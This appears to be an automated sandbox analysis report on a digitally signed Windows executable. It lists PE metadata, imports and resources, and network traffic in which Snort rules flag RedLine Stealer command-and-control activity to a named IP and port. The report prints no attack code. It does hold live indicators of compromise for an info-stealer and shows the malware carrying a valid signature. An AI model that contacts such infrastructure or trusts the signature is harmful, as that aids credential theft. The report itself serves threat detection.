                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x5d0974
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x6399D230 [Wed Dec 14 13:40:00 2022 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:8708d1fe1b5ff509570e29ce51663405

                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                      Signature Valid:true
                                                                                                                                                                      Signature Issuer:CN=SSL.com Code Signing Intermediate CA RSA R1, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                                                      Error Number:0
                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                      • 5/19/2023 8:32:29 AM 5/17/2024 8:32:29 AM
                                                                                                                                                                      Subject Chain
                                                                                                                                                                      • CN=IMPERIOUS TECHNOLOGIES LIMITED, O=IMPERIOUS TECHNOLOGIES LIMITED, L=Ringwood, C=GB
                                                                                                                                                                      Version:3
                                                                                                                                                                      Thumbprint MD5:C9CEC5817E76867C2EFE9D2B497007B6
                                                                                                                                                                      Thumbprint SHA-1:21A97512A2959B0E74729BE220102AEF1DCF56FD
                                                                                                                                                                      Thumbprint SHA-256:8ED289FCC40BBC150A52B733123F6094CCFB2C499D6E932B0D9A6001490FB7E6
                                                                                                                                                                      Serial:3AB74A2EBF93447ADB83554B5564FE03

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      call 00007FCFF102A42Bh
                                                                                                                                                                      jmp 00007FCFF1029C5Fh
                                                                                                                                                                      mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                      pop ecx
                                                                                                                                                                      pop edi
                                                                                                                                                                      pop edi
                                                                                                                                                                      pop esi
                                                                                                                                                                      pop ebx
                                                                                                                                                                      mov esp, ebp
                                                                                                                                                                      pop ebp
                                                                                                                                                                      push ecx
                                                                                                                                                                      ret
                                                                                                                                                                      mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                      xor ecx, ebp
                                                                                                                                                                      call 00007FCFF10292B3h
                                                                                                                                                                      jmp 00007FCFF1029DC2h
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      mov dword ptr [eax], ebp
                                                                                                                                                                      mov ebp, eax
                                                                                                                                                                      mov eax, dword ptr [006E4020h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr [ebp-04h]
                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                                                      ret
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      mov dword ptr [eax], ebp
                                                                                                                                                                      mov ebp, eax
                                                                                                                                                                      mov eax, dword ptr [006E4020h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      push eax
                                                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                                                      push dword ptr [ebp-04h]
                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                                                      ret
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                                                                      lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                      sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      mov dword ptr [eax], ebp
                                                                                                                                                                      mov ebp, eax
                                                                                                                                                                      mov eax, dword ptr [006E4020h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      push eax
                                                                                                                                                                      mov dword ptr [ebp-10h], esp
                                                                                                                                                                      push dword ptr [ebp-04h]
                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                      mov dword ptr fs:[00000000h], eax

                                                                                                                                                                      Data Directories

                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e223c0x28.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2f10000x20bbc.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x71bfd00x2888
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x3120000x279d0.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2881880x70.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x2882000x18.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x259d500x40.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2580000x2e8.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2df5e80x260.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                      Sections

                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x2565c60x256600unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rdata0x2580000x8b3220x8b400False0.3123246745960503data4.589889619444622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0x2e40000xcf400x3a00False0.2693292025862069data4.761885688726732IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rsrc0x2f10000x20bbc0x20c00False0.1356303673664122data5.260618272073059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x3120000x279d00x27a00False0.4465817231861199data6.521615115365491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                      Resources

                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_BITMAP0x2f18e00x13eDevice independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colorsEnglishUnited States0.25471698113207547
                                                                                                                                                                      RT_BITMAP0x2f1a200x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.03017241379310345
                                                                                                                                                                      RT_BITMAP0x2f22480x48a8Device independent bitmap graphic, 290 x 16 x 32, image size 0EnglishUnited States0.11881720430107527
                                                                                                                                                                      RT_BITMAP0x2f6af00xa6aDevice independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/mEnglishUnited States0.21680420105026257
                                                                                                                                                                      RT_BITMAP0x2f755c0x152Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colorsEnglishUnited States0.5295857988165681
                                                                                                                                                                      RT_BITMAP0x2f76b00x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.4875478927203065
                                                                                                                                                                      RT_ICON0x2f7ed80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.16129032258064516
                                                                                                                                                                      RT_ICON0x2f81c00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.32094594594594594
                                                                                                                                                                      RT_ICON0x2f82e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.16463414634146342
                                                                                                                                                                      RT_ICON0x2f93900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.18565573770491803
                                                                                                                                                                      RT_ICON0x2f9d180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3262411347517731
                                                                                                                                                                      RT_DIALOG0x2fa1800xacdataEnglishUnited States0.7151162790697675
                                                                                                                                                                      RT_DIALOG0x2fa22c0xccdataEnglishUnited States0.6911764705882353
                                                                                                                                                                      RT_DIALOG0x2fa2f80x1b4dataEnglishUnited States0.5458715596330275
                                                                                                                                                                      RT_DIALOG0x2fa4ac0x136dataEnglishUnited States0.6064516129032258
                                                                                                                                                                      RT_DIALOG0x2fa5e40x4cdataEnglishUnited States0.8289473684210527
                                                                                                                                                                      RT_STRING0x2fa6300x234dataEnglishUnited States0.4645390070921986
                                                                                                                                                                      RT_STRING0x2fa8640x182dataEnglishUnited States0.5103626943005182
                                                                                                                                                                      RT_STRING0x2fa9e80x50dataEnglishUnited States0.7375
                                                                                                                                                                      RT_STRING0x2faa380x9adataEnglishUnited States0.37662337662337664
                                                                                                                                                                      RT_STRING0x2faad40x2f6dataEnglishUnited States0.449868073878628
                                                                                                                                                                      RT_STRING0x2fadcc0x5c0dataEnglishUnited States0.3498641304347826
                                                                                                                                                                      RT_STRING0x2fb38c0x3c2dataEnglishUnited States0.35343035343035345
                                                                                                                                                                      RT_STRING0x2fb7500x100dataEnglishUnited States0.5703125
                                                                                                                                                                      RT_STRING0x2fb8500x484dataEnglishUnited States0.39186851211072665
                                                                                                                                                                      RT_STRING0x2fbcd40x1eadataEnglishUnited States0.44081632653061226
                                                                                                                                                                      RT_STRING0x2fbec00x18adataEnglishUnited States0.5228426395939086
                                                                                                                                                                      RT_STRING0x2fc04c0x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46254681647940077
                                                                                                                                                                      RT_STRING0x2fc2640x624dataEnglishUnited States0.3575063613231552
                                                                                                                                                                      RT_STRING0x2fc8880x660dataEnglishUnited States0.3474264705882353
                                                                                                                                                                      RT_STRING0x2fcee80x2e2dataEnglishUnited States0.4037940379403794
                                                                                                                                                                      RT_GROUP_ICON0x2fd1cc0x22dataEnglishUnited States1.0
                                                                                                                                                                      RT_VERSION0x2fd1f00x2dcdataEnglishUnited States0.44672131147540983
                                                                                                                                                                      RT_HTML0x2fd4cc0x3835ASCII text, with very long lines (443), with CRLF line terminatorsEnglishUnited States0.08298005420807561
                                                                                                                                                                      RT_HTML0x300d040x1316ASCII text, with CRLF line terminatorsEnglishUnited States0.18399508800654932
                                                                                                                                                                      RT_HTML0x30201c0x52bHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.36281179138321995
                                                                                                                                                                      RT_HTML0x3025480x6acdHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10679931238798873
                                                                                                                                                                      RT_HTML0x3090180x6a2HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3486454652532391
                                                                                                                                                                      RT_HTML0x3096bc0x104aHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.2170263788968825
                                                                                                                                                                      RT_HTML0x30a7080x15b1HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.17612101566720692
                                                                                                                                                                      RT_HTML0x30bcbc0x205cexported SGML document, ASCII text, with very long lines (659), with CRLF line terminatorsEnglishUnited States0.13604538870111058
                                                                                                                                                                      RT_HTML0x30dd180x368dHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10834228428213391
                                                                                                                                                                      RT_MANIFEST0x3113a80x813XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.41025641025641024

                                                                                                                                                                      Imports

                                                                                                                                                                      DLLImport
                                                                                                                                                                      KERNEL32.dllCreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, MoveFileW, GetLastError, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateProcessW, GetExitCodeProcess, GetWindowsDirectoryW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, LocalFree, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, LocalAlloc, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, GetProcessAffinityMask, GetModuleHandleA, GlobalMemoryStatus, ReleaseSemaphore, CreateSemaphoreW

                                                                                                                                                                      Possible Origin

                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      192.168.2.345.135.232.244973698782046105 08/21/23-19:35:51.013900TCP2046105ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound)497369878192.168.2.345.135.232.24
                                                                                                                                                                      192.168.2.345.135.232.244973798782046045 08/21/23-19:35:51.481894TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)497379878192.168.2.345.135.232.24
                                                                                                                                                                      45.135.232.24192.168.2.39878497372046056 08/21/23-19:35:54.924171TCP2046056ET TROJAN Redline Stealer Activity (Response)98784973745.135.232.24192.168.2.3
                                                                                                                                                                      192.168.2.345.135.232.244973698782046045 08/21/23-19:35:51.013900TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)497369878192.168.2.345.135.232.24
                                                                                                                                                                      192.168.2.345.135.232.244973798782046105 08/21/23-19:35:54.854691TCP2046105ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound)497379878192.168.2.345.135.232.24

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Aug 21, 2023 19:35:21.569868088 CEST49723443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:21.569953918 CEST4434972381.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:21.570060015 CEST49723443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:21.602030039 CEST49723443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:21.602075100 CEST4434972381.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:21.730031967 CEST4434972381.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:21.730357885 CEST49723443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:21.741868973 CEST49723443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:21.741894960 CEST4434972381.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:21.742410898 CEST4434972381.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:21.789148092 CEST49723443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:21.834806919 CEST4434972381.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:21.971314907 CEST4434972381.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:21.971460104 CEST4434972381.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:21.971714020 CEST49723443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:21.974299908 CEST49723443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:23.981787920 CEST49724443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:23.981858015 CEST4434972481.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:23.982044935 CEST49724443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:23.984397888 CEST49724443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:23.984428883 CEST4434972481.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.116677046 CEST4434972481.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.116874933 CEST49724443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.120498896 CEST49724443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.120522976 CEST4434972481.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.120866060 CEST4434972481.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.125458956 CEST49724443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.166914940 CEST4434972481.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.243397951 CEST4434972481.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.243763924 CEST4434972481.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.243889093 CEST49724443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.262736082 CEST49724443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.294485092 CEST49725443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.294569016 CEST4434972581.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.294684887 CEST49725443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.295591116 CEST49725443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.295627117 CEST4434972581.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.407994986 CEST4434972581.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.413261890 CEST49725443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.413311005 CEST4434972581.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.565537930 CEST4434972581.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.565699100 CEST4434972581.177.140.69192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:24.565862894 CEST49725443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:24.566409111 CEST49725443192.168.2.381.177.140.69
                                                                                                                                                                      Aug 21, 2023 19:35:46.966348886 CEST497359878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:47.031122923 CEST98784973545.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:47.031245947 CEST497359878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:47.972649097 CEST497359878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:48.127202034 CEST497369878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:48.188019037 CEST98784973645.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:48.188193083 CEST497369878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:48.188934088 CEST497369878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:48.246918917 CEST98784973645.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:48.300309896 CEST497369878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:51.013900042 CEST497369878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:51.074237108 CEST98784973645.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:51.115629911 CEST497369878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:51.358385086 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:51.418598890 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:51.418926001 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:51.419022083 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:51.481524944 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:51.481894016 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:51.542574883 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:51.597395897 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:54.854691029 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:54.924170971 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:54.924206018 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:54.924227953 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:54.924276114 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:54.924284935 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:54.924310923 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:54.924329042 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:35:54.924422979 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:35:54.924422979 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.584383965 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.649682045 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.649722099 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.649744987 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.650006056 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.712760925 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.712794065 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713031054 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.713046074 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713073015 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713088989 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713104963 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713206053 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.713248968 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713258028 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713267088 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713275909 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713510036 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.773221970 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773261070 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773283958 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773303986 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773322105 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773343086 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773365974 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773385048 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773403883 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773423910 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773442984 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773464918 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773475885 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.773499966 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773520947 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773575068 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.773646116 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773667097 CEST98784973745.135.232.24192.168.2.3
